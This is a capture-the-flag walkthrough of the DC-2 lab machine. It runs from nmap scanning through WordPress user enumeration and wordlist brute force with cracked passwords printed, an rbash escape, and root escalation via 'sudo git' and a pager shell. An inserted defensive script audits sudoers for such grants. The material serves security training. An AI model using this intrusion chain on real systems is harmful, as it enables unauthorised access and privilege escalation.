DC-2 Walkthrough
Information gathering
Discover the target host's IP address
Scan with nmap
nmap -sP 192.168.64.0/24 -oN nmapsP.txt
Probe the target host's open ports
Scan with nmap
nmap -A 192.168.64.136 -p 1-65535 -oN nampA.txt
Open ports: http on 80; ssh on 7744 (moved from the default port)
Visit port 80
The site cannot be reached by entering the address directly
The download that comes back leaves us a hint: the hosts file has to be modified
Because the URL redirects to http://dc-2, the local hosts file must be modified
Path of the hosts file on Windows
C:\Windows\System32\drivers\etc\hosts
Path of the hosts file on Linux
/etc/hosts
vim /etc/hosts
Once inside, press i
Add the line 192.168.64.136 dc-2
Press Esc, then
:wq
The site now loads and flag1 is found
Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.
Exploitation
Generating a wordlist with cewl
cewl is a password wordlist generator shipped with Kali. It crawls the target web pages, collects the keywords it finds there and builds a password wordlist from them.
Usage: cewl <url>
cewl dc-2 > passwd.dir
Sensitive directory scanning
There are many directory scanning tools:
dirb
dirbuster
gobuster
......
dirb http://dc-2
==> DIRECTORY: http://dc-2/wp-admin/
==> DIRECTORY: http://dc-2/wp-content/
==> DIRECTORY: http://dc-2/wp-includes/
Scanning with wpscan
The site's CMS is WordPress, and wpscan is a scanner dedicated to WordPress (version, vulnerabilities, accounts and so on)
wpscan --url dc-2 -e u    # enumerate user accounts
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Three users found: admin, jerry, tom
Brute force
Write a username wordlist, then run
wpscan --url dc-2 -U user.dir -P passwd.dir
Credentials obtained:
[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
Try logging in at
http://dc-2/wp-admin/user/admin.php
flag2 is found in jerry's account; tom's account has nothing
Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.
login: tom  password: parturient
SSH in as tom
ssh tom@192.168.64.136 -p 7744
tom@DC-2:~$ ls
flag3.txt usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$
The shell turns out to be rbash, a restricted bash
rbash bypass
rbash is a restricted bash: to improve security it forbids the user a number of operations that could damage the system.
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
Reference article: https://www.freebuf.com/articles/system/188989.html
tom@DC-2:~$ BASH_CMDS[a]=/bin/sh;a
$ export PATH=$PATH:/bin/
$ export PATH=$PATH:/usr/bin
$
$ ls
flag3.txt usr
$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
flag3 obtained
Switch to the jerry user
$ su jerry
Password:
jerry@DC-2:/home/tom$ ls
ls: cannot open directory .: Permission denied
jerry@DC-2:/home/tom$ cd ~
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet.
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!
flag4 is found in jerry's home directory
The hint points to privilege escalation through git
Privilege escalation
sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git
sudo git can be run without a password
git is a program for managing files
sudo git --help
sudo git -p --help    # -p forces the output through a pager; when the text does not fit on one screen we land in the pager's interactive mode (enlarge the terminal font if it does fit)
!/bin/bash    # typed at the pager prompt, this invokes bash
Enter root's home directory
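The root shell above comes from a sudoers rule that lets jerry run git as root without a password, and git happily opens a pager. The following script is an added example, not part of the original writeup or of DC-2: it audits sudoers-style rules for NOPASSWD grants on binaries that open a pager or editor in normal use. The binary list and the sample rules are constructed for this example; the jerry line mirrors the finding on DC-2.

```shell
#!/bin/sh
# Added example, not from the original writeup: flag NOPASSWD sudo rules whose
# command can hand the caller an interactive shell through a pager or editor,
# which is exactly what "sudo git -p --help" does on DC-2.

# Short illustrative list (constructed) of binaries that spawn a pager/editor.
SHELL_CAPABLE='git less more man vim vi nano'

# Constructed sample sudoers content; the jerry rule mirrors the DC-2 finding.
SAMPLE_SUDOERS='Defaults env_reset
# comment line that must be ignored
jerry ALL=(root) NOPASSWD: /usr/bin/git
tom ALL=(root) NOPASSWD: /usr/bin/systemctl status, /usr/bin/less /var/log/syslog
backup ALL=(root) NOPASSWD: /usr/bin/rsync
alice ALL=(ALL) ALL'

# Print "<user> <command>" for every NOPASSWD command whose basename is in
# SHELL_CAPABLE. Comment lines and rules that still ask for a password are skipped.
audit_sudoers() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | grep 'NOPASSWD:' |
    while IFS= read -r line; do
        user=$(printf '%s\n' "$line" | awk '{print $1}')
        # Everything after NOPASSWD: is a comma-separated command list.
        printf '%s\n' "$line" | sed 's/.*NOPASSWD:[[:space:]]*//' | tr ',' '\n' |
        while IFS= read -r entry; do
            cmd=$(printf '%s\n' "$entry" | awk '{print $1}')
            base=${cmd##*/}
            for b in $SHELL_CAPABLE; do
                if [ "$base" = "$b" ]; then
                    printf '%s %s\n' "$user" "$cmd"
                fi
            done
        done
    done
}

# On the sample rules this reports jerry's git grant and tom's less grant.
audit_sudoers "$SAMPLE_SUDOERS"
```

On a real host, feed it the output of `sudo cat /etc/sudoers /etc/sudoers.d/*` instead of the sample text; any hit should be rewritten to a non-interactive wrapper or given a password requirement.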
root@DC-2:/home/jerry# id
uid=0(root) gid=0(root) groups=0(root)
root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/
Congratulatons!!!
A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Done!!!